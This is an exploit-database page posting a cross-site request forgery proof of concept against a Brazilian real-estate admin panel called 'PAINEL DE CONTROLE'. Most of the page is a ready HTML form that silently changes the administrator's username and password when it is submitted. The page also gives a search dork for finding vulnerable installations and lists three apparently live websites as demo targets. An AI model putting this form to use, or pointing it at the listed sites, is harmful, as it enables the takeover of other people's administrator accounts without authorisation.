Home / exploitsPDF  

PAINEL DE CONTROLE - Add Admin CSRF

Posted on 30 November -0001

<HTML><HEAD><TITLE>PAINEL DE CONTROLE - Add Admin (CSRF)</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY> _____________________________________________________________ #Exploit Title: PAINEL DE CONTROLE - Add Admin (CSRF) #Exploit Author : BlackErroR #Telegram : @BlackErroR1 #Exploit Dork: inurl:"/adm/login.php" intext:"PAINEL DE CONTROLE" #Tested On: Win 7/Firefox #VendorHomePage : http://www.sistemas.noisketa.com.br/ #Date: 1/14/2017 #Video Training : http://opizo.com/RgS2Hw _______________________________________________________________ Code : <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Sistema de Administra&ccedil;&atilde;o de Im&oacute;ves</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link href="css.css" rel="stylesheet" type="text/css" /> <script src="js/funcoes.js" type="text/javascript"></script> </head> <body> <table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" class="borda"> <!--DWLayoutTable--> <tr> <td height="57" colspan="3" valign="top" class="borda2"><img src="imagens/img-topo-adm.jpg"></td> </tr> <tr> <td width="200" rowspan="6" valign="top" class="borda_menu"> <style type="text/css"> #menuAdm{ width:200px; height:25px; text-align:center; background-color:#CCC; color:#000; border:solid 1px; border-color:#333; font-size:14px; padding:12px; list-style:none; } li:hover{ background-color:#666; } a:hover{ font-weight:bold; color:#FFF; text-decoration:none; } </style> <div align="left"> <ul> <li id="menuAdm"><a href="index.php" class="menu_admin">In?cio</a></li> <li id="menuAdm"><a href="imoveis_tipo.php" class="menu_admin">Tipos de im&oacute;veis</a></li> <li id="menuAdm"><a href="negocio.php" class="menu_admin">Tipos de neg&oacute;cios</a></li> <li id="menuAdm"><a href="cidades.php" class="menu_admin">Cidades</a></li> <li id="menuAdm"><a href="bairros.php" class="menu_admin">Bairros</a></li> <li id="menuAdm"><a href="imoveis.php" class="menu_admin">Gerenciar im&oacute;veis</a></li> <li id="menuAdm"><a href="newslleter.php" class="menu_admin">Novidades</a></li> <li id="menuAdm"><a href="empresa.php" class="menu_admin">Configurar Dados da Empresa</a></li> <li id="menuAdm"><a href="servicos.php" class="menu_admin">Servicos</a></li> <li id="menuAdm"><a href="user.php" class="menu_admin">Alterar senha</a></li> <li id="menuAdm"><a href="sair.php" class="menu_admin"><font color="#FF0000"><strong>Sair do sistema</strong></font></a></li> </ul> </div> <span style="margin-left:25px;" class="busca_imovel_pag_detalhes">Buscar por c&oacute;digo</span> <form name="fbusca" id="fbusca" action="buscar.php" class="menu_admin" method="post" style="margin: 0; margin-left:25px;" > <input type="text" name="cbusca" id="cbusca" class="campos_imovel_detalhes"/><br /> <input type="submit" name="submit" id="submit" value="Buscar" /> </form> </td> </tr> <tr> <td colspan="4" valign="top"> <!--conteudo--> <div style="margin-left:10px;" align="left"> <span class="titulos-adm">&raquo; Alterar meus dados do administrador</span> <p>Alterar seus dados de acesso</p> <fieldset><legend>ALTERAR DADOS</legend> <form name="editsenha" method="post" action="site/adm/user.php?acao=edit"> <label><b>Usu&aacute;rio</b></label><br /> <input type="text" name="login" value="." maxlength="14" size="70" /><br /><br /> <label><b>Confirmar usu&aacute;rio</b></label><br /> <input type="text" name="login2" value="." maxlength="14" size="70" /><br /><br /> <label><b>Senha</b></label><br /> <input type="password" name="senha" value="." maxlength="14" size="70" /><br /><br /> <label><b>Confirmar senha</b></label><br /> <input type="password" name="senha2" value="." maxlength="14" size="70" /><br /><br /> <input type="submit" name="submit" value="Alterar senha" /> </form> </fieldset> <!-- fim conte?do --> </div> </td> </tr> </table> </body> </html> ______________________________________________________________ #DEMO [+]http://rcborgesconstrutora.com.br/site/adm/login.php [+]http://www.marcosrodriguesdearaujo.com.br/imovel/adm/login.php [+]http://gruposouzaimoveis.com.br/adm/login.php __________________________________________________________________</BODY></HTML>

 

TOP